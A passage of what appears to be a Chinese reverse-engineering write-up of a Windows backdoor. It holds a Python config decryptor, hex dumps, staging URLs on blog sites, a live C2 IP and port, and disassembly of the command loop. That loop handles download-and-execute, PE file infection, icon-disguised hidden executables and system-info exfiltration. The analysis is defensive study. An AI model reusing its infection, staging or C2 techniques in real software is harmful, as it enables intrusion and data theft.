check_value = struct.unpack('H',decrypt_data_[4:6])[0]
print "check_value %08x" % check_value
ecx = first_dword
eax = 0
esi = decrypt_data_[6:]
cur_offset = 0
while ecx >= 4:
eax = eax + struct.unpack('I',esi[cur_offset:cur_offset + 4])[0]
cur_offset = cur_offset + 4
ecx = ecx -4
eax = eax & 0xffff
if eax == check_value:
real_data = decrypt_data_[6:first_dword+6]
hOutFile.write(real_data)
else:
print "no content found"
if __name__=="__main__":
if len(sys.argv) != 2:
print "usage: %pro download_config"
os.sys.exit(1)
srcFile = os.sys.argv[1]
hSrc = file(srcFile, "rb")
data = hSrc.read()
hSrc.close()
dstFile = "%s.decrypt.v" % srcFile
hDstFile = file(dstFile, "wb")
Decrypt_Config(data, hDstFile)
hDstFile.close()
大小0x5f
$ ==> >41 10 49 7D 44 4E 46 55 AI}DNFU
$+8 >70 64 61 74 65 30 33 30 pdate030
$+10 >38 2E 65 78 65 00 68 74 8.exe.ht
$+18 >74 70 3A 2F 2F 77 77 77 tp://www
$+20 >2E 31 64 69 73 6B 2E 63 .1disk.c
$+28 >6E 2F 43 6F 6E 74 65 6E n/Conten
$+30 >74 50 61 6E 65 2E 61 73 tPane.as
$+38 >70 78 3F 64 6F 77 6E 3D px?down=
$+40 >6F 6B 26 66 69 6C 65 70 ok&filep
$+48 >61 74 68 3D 74 65 73 74 ath=test
$+50 >37 37 35 38 25 32 66 44 7758%2fD
$+58 >4E 46 2E 64 61 74 00 NF.dat.
解密后的数据,
的结构为:
struct download_config
{
+0 dword frist_dword 下载的文件大小
+4 byte byte_4取决于byte_5
+5 byte byte_5
+len(filename) 之后的下载连接
}
如果byte_5是“:”,分两种情况,
byte_4是 “%” ,则下到系统目录
byte_4不是 “%” 则会判断文件是否存在,如果不存在,直接下载到当前目录
如果byte_5不是“:”,从偏移为4 开始作为文件名的一部分下载到临时目录
接下来从
http://home.51.com/?u=test4862&c=diary&a=getdataview&id=10052358
http://hi.baidu.com/test6345/home(下载下来的data并没有########标志,估计是作者已经把配置文件给删了)
http://www.fnsorfnfgsajr.com/test.htm(连接已经失效)
下载配置数据,猜测下载下来的数据很可能是一样的,因为首先是从第一个连接去下载如果下载成功则不会去第二个连接下载,以此类推
从http://home.51.com/?u=test4862&c=diary&a=getdataview&id=10052358下载的数据为:
{
window.modData = {"view":{"id":"10052358","gid":"135189","is_top":"0","heart":"","title":"2010-11-21\u7684\u65e5\u8bb0","memo":"########AKAAAAAAHAHAAAAAAAAAHAHAAAAAAAAA","weekday":"1","show_time":"2010-11-21 19:46:00","flower":"0","egg":"0","ping":"0","click":"4223644","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/test4862\/diary\/item\/10052358.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290340014"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/test4862\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/test4862\/diary\/item\/.html"},"catalog":[{"id":"135189","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/test4862\/diary\/group\/135189","count":"1"},{"id":"135190","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/test4862\/diary\/group\/135190","count":"0"},{"id":"135191","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/test4862\/diary\/group\/135191","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u6e05\u98ce\u4f9d\u65e7","face":"http:\/\/p4.u.51img1.com\/40\/47\/dis13141998_50.gif?v=20110614170758","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"0","isopen":"0","user":"dis13141998","_user":"dis13141998","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u95ef\u5165\u8005","face":"http:\/\/p9.u.51img1.com\/9e\/a5\/lilina198787_50.gif?v=20090404160945","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lilina198787","_user":"lilina198787","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\ufe4f\u53f6\u843d\u65e0\u58f0\u3001","face":"http:\/\/p6.u.51img1.com\/63\/63\/236527861_50.gif?v=20111013151050","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"236527861","_user":"aweiy_z","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"4"},"morediary":[],"current":{"gid":"135189","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/test4862\/diary\/group\/135189"}};
}
同样解密算法
返回的大小 0x0a
$ ==> >00 00 00 00 70 70 00 00 ....pp..
$+8 >00 00 ..
$ ==> 00900020 00 00 00 00 70 70 00 00 ....pp..
$+8 00900028 00 00 70 70 00 00 00 00 ..pp....
$+10 00900030 EF 37 66 A3 3B FF FF EF ?f?
$+18 00900038 33 7E 7F 3A E6 FF FF FF 3~:?
$+20 00900040 EE FF FF FF FF FF FF EF ?
$+28 00900048 EF 37 BE 66 EF EF EF EF ?緁镲镲
$+30 00900050 66 FF EF EF EF FA F6 FF f镲嵇?
$+38 00900058 EF EF 32 BA 2A FF FF FF 镲2?
$+40 00900060 FF FF EF 33 F7 32 73 FF ??s
$+48 00900068 EF EF 33 72 36 E7 B2 FF 镲3r6绮
$+50 00900070 EF FF EF 27 33 5F 73 73 ??3_ss
$+58 00900078 FF EF EF 37 A3 5F 2E EE 镲7.
$+60 00900080 6F EF EF EF EF 27 33 5F o镲镲'3_
$+68 00900088 F7 FF EF EF EF 73 ?镲飐镲
struct confif_data_for_backdoor
{
+0 dword 判断是否需要从其他链接中下载配置文件 如果为0 则表示需要 赋值给00401854
+4 word 赋值给00401852
+6 word 扩充为dword赋值给00401844
+8 dword control_flag 与dword(0040184c)相或 赋值给00401848 控制接下来的行为 0040184c初始为0 或得结果为70700000
但是解密返回来的大小为0xa 如果这个是个dword明显超出了 我们回头看看其解密过程的末尾
.text:00401AC5 mov ecx, [ebp+first_dword_after_decrypt]
.text:00401AC8 mov edi, [ebp+arg_0_read_data]
.text:00401ACB mov esi, edi
.text:00401ACD add esi, 6
.text:00401AD0 rep movsb
显然它把解密后的数据从偏移为6 开始向前覆盖了 所以偏移为+a 的word就是偏移为4的word 即0x7070
}
看看控制的相关代码
text:004050CD execute_command_accordingto_dword_flag proc near
.text:004050CD ; CODE XREF: net_activity+102p
.text:004050CD ; net1+1C4p
.text:004050CD
.text:004050CD arg_0_confif_data_for_backdoor_jia_c= dword ptr 8
.text:004050CD arg_4_0x1000 = dword ptr 0Ch
.text:004050CD
.text:004050CD 55 push ebp
.text:004050CE 8B EC mov ebp, esp
.text:004050D0 ; nop code
.text:004050D7 B8 48 18 40 00 mov eax, 401848h
.text:004050DC F7 00 00 00 00 10 test dword ptr [eax], 10000000h
.text:004050E2 74 0D jz short loc_4050F1
.text:004050E4 FF 75 0C push [ebp+arg_4_0x1000]
.text:004050E7 FF 75 08 push [ebp+arg_0_confif_data_for_backdoor_jia_c]
.text:004050EA E8 2A 0E 00 00 call Download_file_execute
.text:004050EF EB 21 jmp short loc_405112
.text:004050F1 ; nop code
.text:004050F8 B8 48 18 40 00 mov eax, offset unk_401848
.text:004050FD F7 00 00 00 00 20 test dword ptr [eax], 20000000h
.text:00405103 74 0D jz short loc_405112
.text:00405105 FF 75 0C push [ebp+arg_4_0x1000]
.text:00405108 FF 75 08 push [ebp+arg_0_confif_data_for_backdoor_jia_c]
.text:0040510B E8 17 1B 00 00 call CreateFile_Exuecute
.text:00405110 EB 00 jmp short $+2
.text:00405112 ; nop code
.text:00405119 B8 48 18 40 00 mov eax, offset unk_401848
.text:0040511E F7 00 00 00 00 40 test dword ptr [eax], 40000000h
.text:00405124 74 05 jz short locret_40512B
.text:00405126 E8 47 E6 FF FF call Infect_with_flag__
.text:0040512B
.text:0040512B locret_40512B: ; CODE XREF: execute_command_accordingto_dword_flag+57j
.text:0040512B C9 leave
.text:0040512C C2 08 00 retn
if (control_flag & 0x10000000)
下载执行,其中连接由confif_data_for_backdoor+c 指定
goto infect
if (control_flag & 0x20000000)
如果有% 则直接用系统盘替换%
否则,在系统目录下创建文件 文件名由confif_data_for_backdoor+c 指定
goto infect
infect:
if (control_flag & 0x40000000)
if (control_flag & 0x00000001)
{
40000101 删除doc后缀同名的文件 删除与文件夹同名的文件 删除inf文件
40000081 什么也不做
40000021 写入与文件夹同名的exe 保证图标与文件夹图标一致 属性为FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM
40000041 写入与doc同名的exe 保证图标与doc文档图标一致 属性为FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM
40000009 如果标志位为40000208 则不检查是否被感染直接感染 主要针对dll文件
40000011 如果标志位为40000410 则不检查是否被感染直接感染 主要针对exe文件
}
if (control_flag & 0x00000002)
枚举各个盘符只感染如下文件
'RarExt.dll',0
'ppsap.exe',0
'procdll.dll',0
'thunders.dll',0
'Storm.dll',0
前面说过了
confif_data_for_backdoor的第一个dword决定了是否继续下载配置文件 我们下载下来的dword为0 其会继续下载,
http://home.51.com/?u=lichao3596&c=diary&a=getdataview&id=10047625
下载的数据为:
{
window.modData = {"view":{"id":"10047625","gid":"133252","is_top":"0","heart":"","title":"2010-11-21\u7684\u65e5\u8bb0","memo":"########DLAAAAAAFFCENOKOHDJLHAHAEAAABPABAAGACFDKFMFAHCGPGHHCGBGNCAEGGJGMGFHDFMFEGFGOGDGFGOHEFMFBFBFMENFBFBFCGFHDFMFBFBENHFHDGJGDCOGFHIGFAA","weekday":"1","show_time":"2010-11-21 16:25:00","flower":"0","egg":"0","ping":"0","click":"4216665","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/lichao3596\/diary\/item\/10047625.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290327905"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/lichao3596\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/lichao3596\/diary\/item\/.html"},"catalog":[{"id":"133252","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/lichao3596\/diary\/group\/133252","count":"1"},{"id":"133253","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/lichao3596\/diary\/group\/133253","count":"0"},{"id":"133254","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/lichao3596\/diary\/group\/133254","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u95ef\u5165\u8005","face":"http:\/\/p9.u.51img1.com\/9e\/a5\/lilina198787_50.gif?v=20090404160945","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lilina198787","_user":"lilina198787","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u71a0","face":"http:\/\/p3.u.51img1.com\/39\/75\/yilin261010107_50.gif?v=20090528094841&cool=0","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"yilin261010107","_user":"yilin261010107","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"54243","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"237955579","_user":"5759497","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"Amu2730","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"amu2730","_user":"amu2730","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"5"},"morediary":[],"current":{"gid":"133252","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/lichao3596\/diary\/group\/133252"}};
}
解密后的数据为:
返回的大小为0x3b
$ ==> >DE AE 73 9B 70 70 40 00 蕻s沺p@.
$+8 >1F 01 00 60 25 3A 5C 50 .`%:\P
$+10 >72 6F 67 72 61 6D 20 46 rogram F
$+18 >69 6C 65 73 5C 54 65 6E iles\Ten
$+20 >63 65 6E 74 5C 51 51 5C cent\QQ\
$+28 >4D 51 51 52 65 73 5C 51 MQQRes\Q
$+30 >51 4D 75 73 69 63 2E 65 QMusic.e
$+38 >78 65 00 63 2E 65 78 65 xe.c.exe
$+40 >00 EF 37 66 A3 3B FF FF .?f?
$+48 >EF 33 7E 7F 3A E6 FF FF ?~:?
$+50 >FF EE FF FF FF FF FF FF ?
这个结构体和前面的结构体解析是一样的 不过这里的第一个dword 不是作为标志了 而是一个ip地址,用来连接执行后门功能的
其中
00401850指向一个sockaddr
struct confif_data_for_backdoor
{
+0 dword ip_address 赋值给00401854
+4 word port 赋值给00401852
+6 word 扩充为dword赋值给00401844
+8 dword control_flag 与dword(0040184c)相或 赋值给00401848 控制接下来的行为 0040184c初始为0 或得结果为6000011F
}
根据前面的分析 可知道该control_flag 执行的功能为:
创建系统盘:\Program Files\Tencent\QQ\MQQRes\QQMusic.exe
{
40000101 删除doc后缀同名的文件 删除与文件夹同名的文件 删除inf文件
40000008 如果标志位为40000208 则不检查是否被感染直接感染 主要针对dll文件
40000010 如果标志位为40000410 则不检查是否被感染直接感染 主要针对exe文件
}
枚举各个盘符只感染如下文件
.text:00401B71 52 61 72 45 78 74+String1 db 'RarExt.dll',0 ; DATA XREF: infect_pe+CAo
.text:00401B7C 70 70 73 61 70 2E+aPpsap_exe_0 db 'ppsap.exe',0
.text:00401B86 70 72 6F 63 64 6C+aProcdll_dll db 'procdll.dll',0
.text:00401B92 74 68 75 6E 64 65+aThunders_dll db 'thunders.dll',0
.text:00401B9F 53 74 6F 72 6D 2E+aStorm_dll db 'Storm.dll',0
由配置文件可知其连接的ip为:
222.174.115.155 端口为0x7070
执行后门功能的主要线程地址为:
0040512f
后门的功能包括:
获取系统网络信息
下载执行文件
感染pe文件
获取进程列表
杀进程
删除和拷贝文件
截屏
更新ip地址和端口
还会记录计算机名等其他信息到注册表
等等
代码:
.text:0040512F sub_40512F proc near ; DATA XREF: @net_activity_start+4Do
.text:0040512F
.text:0040512F read_size = dword ptr -5F4h
.text:0040512F fromlen = dword ptr -5F0h
.text:0040512F from = sockaddr ptr -5ECh
.text:0040512F buf = byte ptr -5DCh
.text:0040512F s = dword ptr 8
.text:0040512F
.text:0040512F push ebp
.text:00405130 mov ebp, esp
.text:00405132 add esp, 0FFFFFA0Ch
.text:00405138 mov [ebp+fromlen], 10h
.text:00405142
.text:00405142 @recv: ; CODE XREF: sub_40512F+6Ej
.text:00405142 ; sub_40512F+DCj ...
.text:00405142 lea eax, [ebp+fromlen]
.text:00405148 push eax ; fromlen
.text:00405149 lea eax, [ebp+from]
.text:0040514F push eax ; from
.text:00405150 push 0 ; flags
.text:00405152 push 4B0h ; len
.text:00405157 lea eax, [ebp+buf]
.text:0040515D push eax ; buf
.text:0040515E push [ebp+s] ; s
.text:00405161 ; nop code
.text:00405169 call recvfrom
.text:0040516F test eax, eax ; eax = number of bytes to read
.text:00405171 jz @reand_data_is_zero_ro_toobig
.text:00405177 cmp eax, 4B0h
.text:0040517C ja @reand_data_is_zero_ro_toobig
.text:00405182 mov [ebp+read_size], eax
.text:00405188 ; nop code
.text:0040518F mov eax, offset sockaddrr
.text:00405194 mov eax, [eax+4]
.text:00405197 cmp eax, dword ptr [ebp+from.sa_data+2]
.text:0040519D jnz short @recv
.text:0040519F xor eax, eax
.text:004051A1 mov al, [ebp+buf]
.text:004051A7 cmp eax, 4
.text:004051AA jz short @first_byte_is_4
.text:004051AC cmp eax, 3
.text:004051AF jz short loc_405223
.text:004051B1 cmp eax, 1
.text:004051B4 jz @first_byte_is_1
.text:004051BA cmp eax, 9
.text:004051BD jz @first_byte_is_9
.text:004051C3 cmp eax, 0Ah
.text:004051C6 jz @first_byte_is_a
.text:004051CC cmp eax, 0Ch
.text:004051CF jz @first_byte_is_c
.text:004051D5 cmp eax, 6
.text:004051D8 jz @first_byte_is_6
.text:004051DE cmp eax, 0Dh
.text:004051E1 jz @First_byte_is_D
.text:004051E7 cmp eax, 0Eh
.text:004051EA jz @first_byte_is_e
.text:004051F0 cmp eax, 0Fh
.text:004051F3 jz @first_byte_is_f
.text:004051F9 cmp eax, 10h
.text:004051FC jz @first_byte_is_10
.text:00405202 cmp eax, 11h
.text:00405205 jz @first_byte_is_11
.text:0040520B jmp @recv
.text:00405210 ; ---------------------------------------------------------------------------
.text:00405210
.text:00405210 @first_byte_is_4: ; CODE XREF: sub_40512F+7Bj
.text:00405210 push 8
.text:00405212 lea eax, [ebp+buf+1]
.text:00405218 push eax
.text:00405219 call Get_mcname_in_reg
.text:0040521E jmp @recv
.text:00405223 ; ---------------------------------------------------------------------------
.text:00405223
.text:00405223 loc_405223: ; CODE XREF: sub_40512F+80j
.text:00405223 mov eax, [ebp+read_size]
.text:00405229 dec eax
.text:0040522A push eax
.text:0040522B lea eax, [ebp+buf+1]
.text:00405231 push eax
.text:00405232 call Set_mcname_in_reg
.text:00405237 jmp @recv
.text:0040523C ; nop code
.text:00405243 mov eax, offset unk_40188C
.text:00405248 cmp dword ptr [eax], 0
.text:0040524B jnz short loc_405273
.text:0040524D mov eax, dword ptr [ebp+buf+5]
.text:00405253 push eax
.text:00405254 mov eax, dword ptr [ebp+buf+1]
.text:0040525A test eax, eax
.text:0040525C jnz short loc_40526D
.text:0040525E ; nop code
.text:00405265 mov eax, offset sockaddrr
.text:0040526A mov eax, [eax+4]
.text:0040526D
.text:0040526D loc_40526D: ; CODE XREF: sub_40512F+12Dj
.text:0040526D push eax
.text:0040526E call backdoor
.text:00405273
.text:00405273 loc_405273: ; CODE XREF: sub_40512F+11Cj
.text:00405273 jmp @recv
.text:00405278 ; ---------------------------------------------------------------------------
.text:00405278
.text:00405278 @first_byte_is_9: ; CODE XREF: sub_40512F+8Ej
.text:00405278 call query_data_in_reg_send_out
.text:0040527D jmp @recv
.text:00405282 ; ---------------------------------------------------------------------------
.text:00405282
.text:00405282 @first_byte_is_a: ; CODE XREF: sub_40512F+97j
.text:00405282 mov eax, [ebp+read_size]
.text:00405288 dec eax
.text:00405289 push eax
.text:0040528A lea eax, [ebp+buf+1]
.text:00405290 push eax
.text:00405291 call Save_recv_data_to_reg
.text:00405296 jmp @recv
.text:0040529B ; ---------------------------------------------------------------------------
.text:0040529B
.text:0040529B @first_byte_is_c: ; CODE XREF: sub_40512F+A0j
.text:0040529B call Send_sysinfo
.text:004052A0 jmp @recv
.text:004052A5 ; ---------------------------------------------------------------------------
.text:004052A5
.text:004052A5 @first_byte_is_6: ; CODE XREF: sub_40512F+A9j
.text:004052A5 call Close_Socket
.text:004052AA jmp @recv
.text:004052AF ; ---------------------------------------------------------------------------
.text:004052AF
.text:004052AF @First_byte_is_D: ; CODE XREF: sub_40512F+B2j
.text:004052AF push 3E8h
.text:004052B4 lea eax, [ebp+buf+1]
.text:004052BA push eax
.text:004052BB call Download_File_Execute_
.text:004052C0 jmp @recv
.text:004052C5 ; ---------------------------------------------------------------------------
.text:004052C5
.text:004052C5 @first_byte_is_e: ; CODE XREF: sub_40512F+BBj
.text:004052C5 lea eax, [ebp+buf+1]
.text:004052CB push eax
.text:004052CC call Exec
.text:004052D1 jmp @recv
.text:004052D6 ; ---------------------------------------------------------------------------
.text:004052D6
.text:004052D6 @first_byte_is_f: ; CODE XREF: sub_40512F+C4j
.text:004052D6 push 3E8h
.text:004052DB lea eax, [ebp+buf+1]
.text:004052E1 push eax
.text:004052E2 call Download_File_Execute
.text:004052E7 jmp @recv
.text:004052EC ; ---------------------------------------------------------------------------
.text:004052EC
.text:004052EC @first_byte_is_10: ; CODE XREF: sub_40512F+CDj
.text:004052EC lea eax, [ebp+buf+1]
.text:004052F2 push eax
.text:004052F3 call Delete_FILE_IN_TMP
.text:004052F8 jmp @recv
.text:004052FD ; ---------------------------------------------------------------------------
.text:004052FD
.text:004052FD @first_byte_is_11: ; CODE XREF: sub_40512F+D6j
.text:004052FD push 3E8h
.text:00405302 lea eax, [ebp+buf+1]
.text:00405308 push eax
.text:00405309 call Download_File
.text:0040530E jmp @recv
.text:00405313 ; nop code
.text:0040531A mov eax, offset unk_401860
.text:0040531F cmp dword ptr [eax], 0FFFFFFFFh
.text:00405322 jz short @retn
.text:00405324 push 3E8h ; dwMilliseconds
.text:00405329 ; nop code
.text:00405331 ; ---------------------------------------------------------------------------
.text:00405331 call Sleep
.text:00405337 jmp @recv
.text:0040533C ; nop code
.text:00405343 mov eax, 401888h
.text:00405348 mov dword ptr [eax], 0
.text:0040534E leave
.text:0040534F retn 4
.text:0040534F sub_40512F endp
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法